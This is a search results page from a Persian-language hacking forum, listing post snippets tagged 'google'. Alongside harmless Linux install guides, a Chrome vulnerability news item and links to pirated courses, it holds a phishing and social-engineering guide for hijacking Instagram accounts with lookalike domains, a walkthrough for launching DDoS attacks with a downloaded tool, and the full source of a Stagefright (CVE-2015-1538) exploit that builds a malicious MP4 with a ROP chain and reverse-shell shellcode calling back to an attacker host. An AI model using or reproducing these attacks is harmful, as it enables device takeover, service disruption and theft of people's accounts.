iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'google'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

44 نتیجه پیدا شد

  1. دوره آموزشی برنامه نویسی اندروید با نرم افزار EcliPse قیمت در سایت:99 تومان https://tg-go.noyes.in/i/BQADBAADjQAD31esD7xLySabZ9s4Ag/b2316fa419bb69505a8337b578d91e48/1540724696 https://tg-go.noyes.in/i/BQADBAADjgAD31esD34sqTjY-imIAg/751ed11a0adca7c853cbcc62288492ba/1540724696 https://tg-go.noyes.in/i/BQADBAADjwAD31esD6UuWW_ohBPUAg/5e528614e24b7ce0444e32b5a4612357/1540724696 https://tg-go.noyes.in/i/BQADBAADkAAD31esD1gLjKEzy097Ag/66d1138fc8386dd4e5d073862dec9c7b/1540724696
  2. سلام در این تاپیک انواع دورک قرار داده میشه از اسپم دادن خودداری کنید در صورت مشاهده با فرد برخورد میگردد... با تشکر موفق باشید.
  3. Black_petya

    Miscellaneous

    با سلام در این تایپیک میخواهم با روش های مختلف مهندسی اجتماعی شمارا اشنا کنم . 1- fake mail : خب شاید تعجب کنید که یک هکر میتواند به شما از طرف اینستاگرام ایمیل بدهد اما چطور ؟ خب وقتی یک هکر شما را تارگت خود قرار میدهد ابتدا از روش های مختلف میتواند اطلاعات شما را پیدا کند از جمله ( شماره تلفن و ایمیل) بعد پیدا کردن اطلاعات شما با ریموت شدن به ایمیل اینستاگرام به شما ایمیل داده و شمارا به صفحه جعلی کشانده و هک میکند میتوان یکی ازاین اسکریپت هارا از گیتهاب دانلود کنید در خلاصه با راه اندازی این اسکریپت ها میتوانید از اینستاگرام یا از هرجایی حتی از fbi هم به تارگت ایمیل بدهید . 2- استفاده از کلمات صحیح : یکی از قوانین های مهندسی اجتماعی درست نویسی و کلمات صحیح است اگر شما به جای" لطفا گزارش دهدید " بنویسید " گزارش بدید" تارگت 100% میفهمد که در پشت این ایمیل یک هکری نشته است . 3- راه اندازی صفحات جعلی با دامنه های مشابه ان صفحه : شما میتوانید از دامنه های مشابه از سایت های استفاده نمایید مانند ایسنتاگرام میتوانید از www.instagram.tk یا www.instagram.cf استفاده کنید یا اصلا myinstagramreporet.org / .com ... استفاده نمایید . 4- قبل ازدادن لینک باید تارگت را مجبور کنید تا به لینک وارد شود : مثلا شما میخواهید اکانت اینستاگرام یک تارگت را هک کنید باید اکانتش را انقدر ریپورت کنید تا از اینستاگرام برایش اعلان بیایید و وقتی که شما لینک را بهش دادید فوری از ترس وارد لینک شود واقدام به لاگین شود . 5- جعل هویت : بعد از اعمال کار ها حتما از پروکسی یا tor استفاده کنید تا هویت شما مشخص نشود . توجه : این مطلب صرفا جهت اموزش و یادگیری بود و هرگونه استفاده نادرست برعهده خود شخص میباشد.
  4. دوره آموزشی برنامه نویسی اندروید از فرانش https://tg-go.noyes.in/i/BQADBAADJQIAAngMBBHV-c7b8aiwfQI/1e020f4a98684cb3fd2f5669e2e7ec2d/1540117848 https://tg-go.noyes.in/i/BQADBAADJgIAAngMBBGWgpntibzmVQI/9bbbcb49f98a721afededdbc7f61c373/1540117849 https://tg-go.noyes.in/i/BQADBAADJwIAAngMBBHcT9nLh9DyMwI/afa107acebd7f0aeed17afb30558e49b/1540117891 https://tg-go.noyes.in/i/BQADBAADKQIAAngMBBHNDbUhjOSbiQI/abdb50919b97f76ed1ad9e42d47857ca/1540117892 https://tg-go.noyes.in/i/BQADBAADGAIAAg0HwQiwMywL5rThlQI/8a90fa0f6fc748827434b945d91af116/1540117892 https://tg-go.noyes.in/i/BQADBAADKAIAAngMBBE_TkW2_TK1nQI/c02156fb2db78271798f4c402bc14eb3/1540117892
  5. Black_petya

    Hacking-Ddos

    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  6. gD0rk - Google Hack the Dork Automatic Database Tool. gD0rk is a free and open source scanner. Evolved from Google search engine, it has adapted several new features that improve functionality and usability. It is mostly experimental software. The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers. Installation Clone the repository: $ git clone GitHub - dwisiswant0/gD0rk: Google Hack Database dork automatic tool. Then go inside: $ cd gD0rk And install it with composer: $ composer install Recommended PHP Version: gD0rk required PHP 5+, and is currently tested on PHP 7.0.23-1 (CLI). Usage $ php gd0rk.php -d "inurl: index.php? id = ext: php" -p "127.0.0.1:9050" Startup: -d DORK DORK for searching. Optional arguments: -h, --help print this help. -p PROXY surf with PROXY. -o FILE log results to FILE. -v, --verbose shows details about the results of surfing. Help & Bugs If you are still confused or found a bug, please open the issue. All bug reports are appreciated, some features License gD0rk is licensed under the MIT. Take a look at the LICENSE for more information. Version Current version is 1.0 (experimental) and still development.
  7. دوره آموزشی basic 4 android از faradars در سایت به فروش میرسید برای شما رایگان :))) B4a faradars part1.zip - Telegram File Download Service B4a faradars part2.zip - Telegram File Download Service
  8. شما باید هم‌اکنون مرورگر Google Chrome خود را به‌روزرسانی کنید. یک محقق امنیتی به نام Michał Bentkowski یک آسیب‌پذیری حیاتی در Google Chrome را در اواخر ماه می ۲۰۱۸ کشف و گزارش کرد که بر روی این مرورگر و در تمامی سیستم‌عامل‌ها شامل ویندوز، Mac و لینوکس تأثیرگذار است. یک مهاجم می‌تواند از این مسئله برای دور زدن محدودیت‌های امنیتی و انجام اقدامات غیر مجاز استفاده کند؛ این آسیب‌پذیری ممکن است در پیاده‌سازی حملات بیشتر کمک کند. تیم امنیتی Chrome، در گزارش منتشرشده در تاریخ ۶ ژوئن ۲۰۱۸ و بدون اطلاع‌رسانی دقیق از جزئیات فنی در مورد این آسیب‌پذیری که CVE-2018-6148 نام‌گذاری شده است، این مشکل را ناشی از مدیریت نادرست هدر CSP عنوان کرد. تیم امنیتی Chrome در این مورد می‌گوید: “دسترسی به جزئیات این اشکال و پیوندهای موجود ممکن است تا زمانی که اکثریت کاربران مرورگر خود را به‌روز کنند، محدود شود. همچنین اگر این اشکال در یک کتابخانه شخص ثالث وجود داشته باشد که پروژه‌های دیگر را نیز به این آسیب‌پذیری وابسته کند، جزئیات این آسیب‌پذیری فعلاً منتشر نخواهد شد.” هدر (۱)CSP به مدیران وب‌سایت‌ها اجازه می‌دهد تا توسط اجازه دادن به آن‌ها برای کنترل منابعی که مرورگر اجازه دارد load کند، یک لایه امنیتی اضافی را در یک صفحه وب مشخص اضافه کنند. مدیریت نادرست هدرهای CSP توسط مرورگر وب شما می‌تواند مهاجمان را مجدداً قادر به اجرای cross-site scripting ،clickjacking و سایر انواع حملات تزریق کد بر روی هر صفحه وب مورد هدف کند. وصله موردنظر برای این آسیب‌پذیری در حال حاضر در به‌روزرسانی نسخه ۶۷٫۰٫۳۳۹۶٫۷۹ برای سیستم‌عامل ویندوز، Mac و لینوکس در دسترس کاربران قرار گرفته است. بنابراین، مطمئن شوید که سیستم شما نسخه به‌روز شده مرورگر Chrome را اجرا می‌کند. فایرفاکس نیز نسخه جدید خود را از با انتشار فایرفاکس نسخه ۶۰٫۰٫۲ منتشر کرده است که شامل رفع اشکالات امنیتی است. بنابراین، به کاربران فایرفاکس نیز توصیه می‌شود تا مرورگر خود را به‌روزرسانی کنند.
  9. برنامه نویسی براي گوشی هاي اندروید دو شیوه است : شیوه اول برنامه نویسی Native اندروید است. با استفاده از زبان جاوا براي اندروید برنامه مینویسید.در فصول اول و دوم و سوم مبانی ابتدایی و اولیه برنامه نویسی به این روش را توضیح داده ام.اگر دوست دارید فقط براي اندروید برنامه بنویسید و به تمام ویژگی هاي سخت افزاري گوشی اندروید دسترسی داشته باشید از این روش استفاده کنید و فقط این فصول را براي آشنایی اولیه بخوانید.و بعد سراغ کتاب هاي متوسط و پیشرفته بروید. شیوه دوم برنامه نویسی براي اندروید اصطلاحاً Application Web Mobile است که از فصل چهارم به بعد به این شیوه پرداختم.تسلط من روي این شیوه است.و مزیت این شیوه برنامه نویسی Platform Cross است.شما با یک بار کدنویسی میتوانید برنامه خود را بر روي اندروید و iOS و windows phone اجرا کنید.اما عیب این روش این است که برنامه شما به تمامی ویژگی هاي سخت افزاري گوشی دسترسی ندارد و این سبک براي نوشتن برنامه هاي سیستمی که خیلی با سخت افزار در ارتباط است اصلا مناسب نیست.ولی براي برنامه هاي کاربردي مناسب است.
  10. Rednofozi

    Linux

    برای نصب ماژول Google Page Speed در وب سرور Nginx حتما باید در هنگام کامپایل Nginx از سورس به صورت یک ماژول اضافه آن را به وب سرور معرفی کنید *: ابتدا به نصب پیش نیاز های لینوکس می پردازیم : در نسخه های RHEL مانند CentOS : sudo yum install gcc-c++ pcre-dev pcre-devel zlib-devel make در نسخه های بر پایه Debian و Ubuntu : sudo apt-get install build-essential zlib1g-dev libpcre3 libpcre3-dev آخرین نسخه ماژول Google Pagespeed طراحی شده برای Nginx را دانلود میکنیم : cd /root wget https://github.com/pagespeed/ngx_pagespeed/archive/master.zip unzip master.zip cd ngx_pagespeed-master حالا آخرین نسخه Page Speed را از سایت گوگل دانلود کرده و داخل پوشه nginx pagespeed module اکسترکت میکنیم : wget https://dl.google.com/dl/page-speed/psol/1.7.30.3.tar.gz tar -xzvf 1.7.30.3.tar.gz حالا مجددا به root بر میگردیم و سورس نسخه مورد نظر Nginx را دانلود میکنیم : cd /root wget http://nginx.org/download/nginx-1.4.4.tar.gz tar -xzf nginx-1.4.4.tar.gz cd nginx-1.4.4 و در آخر اقدام به کامپایل وب سرور Nginx از سورس میکنیم . با این فرق که علاوه بر ماژول های مورد نظر ، مازول nginx page speed را هم با کمک دستور configure به سورس اضافه میکنیم : ./configure –add-module=/root/ps/ngx_pagespeed-master/ make make install نحوه استفاده از ماژول ngx_pagespeed در nginx : کانفیگ وب سرور nginx برای استفاده از googlepagespeed کار سختی نیست . برای استفاده از pagespeed در nginx کافی است تا مطابق دستورات زیر عمل کنید : دو خط زیر را در فایل nginx.conf و داخل بلاک http اضافه کنید : pagespeed on; pagespeed FileCachePath /var/ngx_pagespeed_cache; حالا در بلاک های مربوط به هر دامنه خطوط زیر را اضافه کنید : location ~ “\.pagespeed\.([a-z]\.)?[a-z]{2}\.[^.]{10}\.[^.]+” { add_header “” “”; } location ~ “^/ngx_pagespeed_static/” { } location ~ “^/ngx_pagespeed_beacon$” { } location /ngx_pagespeed_statistics { allow 127.0.0.1; deny all; } location /ngx_pagespeed_global_statistics { allow 127.0.0.1; deny all; } location /ngx_pagespeed_message { allow 127.0.0.1; deny all; } location /pagespeed_console { allow 127.0.0.1; deny all; } و درانتها وب سرور Nginx را ریستارت کنید : nginx -t service nginx restart
  11. Black_petya

    Linux

    یکی از مورد نیاز ترین ابزار سیستم عامل ها ماشین حساب است اگر شما یک توضیعی برپایه دبیان ساخته اید میتوانید با دستور زیر ماشین حساب gnome را نصب و راه اندازی کنید و در سیستم عاملتان قرار دهید sudo snap install gnome-calculator عکس ماشین حساب
  12. Black_petya

    Linux

    ابتدا لینوکس centos را باز کنید و ترمینال را اجرا کنید دستور زیرا بنویسید wget https://repo.mysql.com//mysql57-community-release-el7-11.noarch.rpm با دستور بالا شروع به دانلود فایل های مربوط به mysql میشود با دستور زیر اقدام به نصب mysql میکنیم sudo rpm -ivh mysql57-community-release-el7-11.noarch.rpm الان با دستور زیر mysql روی centos به صورت کامل نصب میکنیم sudo yum install mysql-server خب شما تواسنتید mysql روی سیستم خود نصب کنید الان اجرا میکنیم sudo systemctl start mysqld با این دستور mysql در سیستم شما اجرا خواهد شد برای تغییر کانفیگ mysql از دستور زیر استفاده کنید sudo mysql_secure_installation و برای تست mysql هم از دستور زیر استفاده کنید mysqladmin -u root -p version با این دستور هم mysql را تست میکنیم امید وارم خوشتون امده باشد .
  13. #!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerability CVE-2015-1538 #1 # Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling # # Don’t forget, the output of “create_mp4” can be delivered many ways! # MMS is the most dangerous attack vector, but not the only one… # # DISCLAIMER: This exploit is for testing and educational purposes only. Any # other usage for this code is not allowed. Use at your own risk. # # “With great power comes great responsibility.” – Uncle Ben # import struct import socket # # Creates a single MP4 atom – LEN, TAG, DATA # def make_chunk(tag, data): if len(tag) != 4: raise ‘Yo! They call it “FourCC” for a reason.’ ret = struct.pack(‘>L’, len(data) + 8) ret += tag ret += data return ret # # Make an ‘stco’ atom – Sample Table Chunk Offets # def make_stco(extra=”): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mNumChunkOffsets return make_chunk(‘stco’, ret+extra) # # Make an ‘stsz’ atom – Sample Table Size # def make_stsz(extra=”): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mDefaultSampleSize ret += struct.pack(‘>L’, 0) # mNumSampleSizes return make_chunk(‘stsz’, ret+extra) # # Make an ‘stts’ atom – Sample Table Time-to-Sample # def make_stts(): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mTimeToSampleCount return make_chunk(‘stts’, ret) # # This creates a single Sample Table Sample-to-Chunk entry # def make_stsc_entry(start, per, desc): ret = ” ret += struct.pack(‘>L’, start + 1) ret += struct.pack(‘>L’, per) ret += struct.pack(‘>L’, desc) return ret # # Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk # # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and # cause a heap overflow. # def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret = struct.pack(‘>L’, 0) # version/flags # this is the clean version… if not do_overflow: ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets ret += ‘Z’ * (12 * num_alloc) return make_chunk(‘stsc’, ret) # now the explicit version. (trigger the bug) ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets # fill in the entries that will overflow the buffer for x in range(0, num_write): ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) ret = make_chunk(‘stsc’, ret) # patch the data_size ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:] return ret # # Build the ROP chain # # ROP pivot by Georg Wicherski! Thanks! # “”” (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} “”” “”” b0001144 <__dl_mprotect>: b0001144: e92d0090 push {r4, r7} b0001148: e3a0707d mov r7, #125 ; 0x7d b000114c: ef000000 svc 0x00000000 b0001150: e8bd0090 pop {r4, r7} b0001154: e1b00000 movs r0, r0 b0001158: 512fff1e bxpl lr b000115c: ea0015cc b b0006894 <__dl_raise+0x10> “”” def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = ” rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc} rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc} rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned) rop += struct.pack(‘<L’, 0x1000) # new r1 – length rop += struct.pack(‘<L’, 7) # new r2 – protection rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect native_start = sp_addr + 0x80 rop += struct.pack(‘<L’, native_start) # address of native payload #rop += struct.pack(‘<L’, 0xfeedfed5) # top of stack… # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit) buf = ” # fork buf += ‘\x02\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # continue if not parent… buf += ‘\x00\x00\x50\xe3’ buf += ‘\x02\x00\x00\x0a’ # exit parent buf += ‘\x00\x00\xa0\xe3’ buf += ‘\x01\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # setsid in child buf += ‘\x42\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # socket/connect/dup2/dup2/dup2 buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’ buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’ buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’ buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’ buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’ buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’ buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’ buf += ‘\xe3\x00\x00\x00\xef’ # execve(shell, argv, env) buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’ buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’ buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’ buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’ buf += ‘\xef\x02\x00’ # Add the connect back host/port buf += struct.pack(‘!H’, cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack(‘=4s’, cb_host) # shell – buf += ‘/system/bin/sh\x00\x00’ # argv – buf += ‘sh\x00\x00’ # env – buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’ # Add some identifiable stuff, just in case something goes awry… rop_start_off = 0x34 x = rop_start_off + len(rop) while len(rop) < 0x80 – rop_start_off: rop += struct.pack(‘<L’, 0xf0f00000+x) x += 4 # Add the native payload… rop += buf return rop # # Build an mp4 that exploits CVE-2015-1538 #1 # # We mimic meow.3gp here… # def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = [] # Build the MP4 header… ftyp = ‘mp42’ ftyp += struct.pack(‘>L’, 0) ftyp += ‘mp42’ ftyp += ‘isom’ chunks.append(make_chunk(‘ftyp’, ftyp)) # Note, this causes a few allocations… moov_data = ” moov_data += make_chunk(‘mvhd’, struct.pack(‘>LL’, 0, 0x41414141) + (‘B’ * 0x5c) ) # Add a minimal, verified trak to satisfy mLastTrack being set moov_data += make_chunk(‘trak’, make_chunk(‘stbl’, make_stsc(0x28, 0x28) + make_stco() + make_stsz() + make_stts() )) # Spray the heap using a large tx3g chunk (can contain binary data!) “”” 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it! “”” page = ” off = 0 # the offset to the next object off += 8 page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28) # _vptr.RefBase (for when we smash mDataSource) page += struct.pack(‘<L’, sp_addr + off) # mRefs off += 16 page += struct.pack(‘<L’, 1) # mStrong page += struct.pack(‘<L’, 0xc0dedbad) # mWeak page += struct.pack(‘<L’, sp_addr + off) # mBase page += struct.pack(‘<L’, 16) # mFlags (dont set OBJECT_LIFETIME_MASK) off += 8 page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase page += struct.pack(‘<L’, 0xf00dbabe) # mBase.mRefs (unused) off += 16 page += struct.pack(‘<L’, 0xc0de0000 + 0x00) # vtable entry 0 page += struct.pack(‘<L’, 0xc0de0000 + 0x04) # vtable entry 4 page += struct.pack(‘<L’, 0xc0de0000 + 0x08) # vtable entry 8 page += struct.pack(‘<L’, newpc_val) # vtable entry 12 rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port) x = len(page) while len(page) < 4096: page += struct.pack(‘<L’, 0xf0f00000+x) x += 4 off = 0x34 page = page[:off] + rop + page[off+len(rop):] spray = page * (((2*1024*1024) / len(page)) – 20) moov_data += make_chunk(‘tx3g’, spray) block = ‘A’ * 0x1c bigger = ‘B’ * 0x40 udta = make_chunk(‘udta’, make_chunk(‘meta’, struct.pack(‘>L’, 0) + make_chunk(‘ilst’, make_chunk(‘cpil’, make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) + make_chunk(‘trkn’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) + make_chunk(‘disk’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘aART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘gnre’, make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger))) ) ) moov_data += udta # Make the nasty trak tkhd1 = ”.join([ ‘\x00’, # version ‘D’ * 3, # padding ‘E’ * (5*4), # {c,m}time, id, ??, duration ‘F’ * 0x10, # ?? struct.pack(‘>LLLLLL’, 0x10000, # a00 0, # a01 0, # dx 0, # a10 0x10000, # a11 0), # dy ‘G’ * 0x14 ]) trak1 = ” trak1 += make_chunk(‘tkhd’, tkhd1) mdhd1 = ”.join([ ‘\x00’, # version ‘D’ * 0x17, # padding ]) mdia1 = ” mdia1 += make_chunk(‘mdhd’, mdhd1) mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a) dinf1 = ” dinf1 += make_chunk(‘dref’, ‘H’ * 0x14) minf1 = ” minf1 += make_chunk(‘smhd’, ‘G’ * 0x08) minf1 += make_chunk(‘dinf’, dinf1) # Build the nasty sample table to trigger the vulnerability here. stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER # Add the stbl to the minf chunk minf1 += make_chunk(‘stbl’, stbl1) # Add the minf to the mdia chunk mdia1 += make_chunk(‘minf’, minf1) # Add the mdia to the track trak1 += make_chunk(‘mdia’, mdia1) # Add the nasty track to the moov data moov_data += make_chunk(‘trak’, trak1) # Finalize the moov chunk moov = make_chunk(‘moov’, moov_data) chunks.append(moov) # Combine outer chunks together and voila. data = ”.join(chunks) return data if __name__ == ‘__main__’: import sys import mp4 import argparse def write_file(path, content): with open(path, ‘wb’) as f: f.write(content) def addr(sval): if sval.startswith(‘0x’): return int(sval, 16) return int(sval) # The address of a fake StrongPointer object (sprayed) sp_addr = 0x41d00010 # takju @ imm76i – 2MB (via hangouts) # The address to of our ROP pivot newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs # Allow the user to override parameters parser = argparse.ArgumentParser() parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’) parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345) parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None) parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None) parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’) args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit(–1) if args.spray_addr == None: args.spray_addr = sp_addr if args.rop_pivot == None: args.rop_pivot = newpc_val # Build the MP4 file… data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) print(‘[*] Saving crafted MP4 to %s …’ % args.output_file) write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf
  14. Black_petya

    Miscellaneous

    با سلام به دوستان عزیز با اموزش ساخت گیف با فتوشاپ همراه شما هستیم لینک دانلود ویدیو : دانلود ویدیو اگر مشکلی داشت در faq مطرح نمایید :) رمز : anonysec
  15. mohammad_ghazei

    Soft-Android

    با استفاده از برنامه Google Home میتوانید Chromecast، Google Home و سایر سخنرانان دستیار را تنظیم و کنترل کنید. * كشف كردن با استفاده از آخرین ویژگی ها، راهنمایی ها و پیشنهادات بیشترین استفاده را از دستگاه های خود داشته باشید. مرور کردن یک مکان برای مرور و پخش موسیقی در دسترس، نمایش های تلویزیونی و فیلم ها از خدماتی که دوست دارید. کنترل مکث، پخش یا تغییر حجم ویدئو یا جریان های صوتی خود را. تنظیمات Google Home و Speaker تنظیمات کنترل مانند پخش کننده پیش فرض موسیقی یا مکان خود را، و دستگاه های سازگار مانند چراغ های هوشمند، ترموستات ها و دستگاه های Chromecast را پیوند دهید. ایجاد گروه های بلندگو با دستگاه های سازگار و لذت بردن از پخش موسیقی در خانه خود. تنظیمات Chromecast صفحه نمایش تلویزیون خود را با تصاویر زیبا سفارشی کنید. کنترل تنظیمات مانند نام دستگاه شما، و کشف برنامه ها، پیشنهادات و محتوا. * برخی از ویژگی ها ممکن است در همه مناطق موجود نباشد لینک دانلود : Google Home - Apps on Google Play
  16. mohammad_ghazei

    Soft-Android

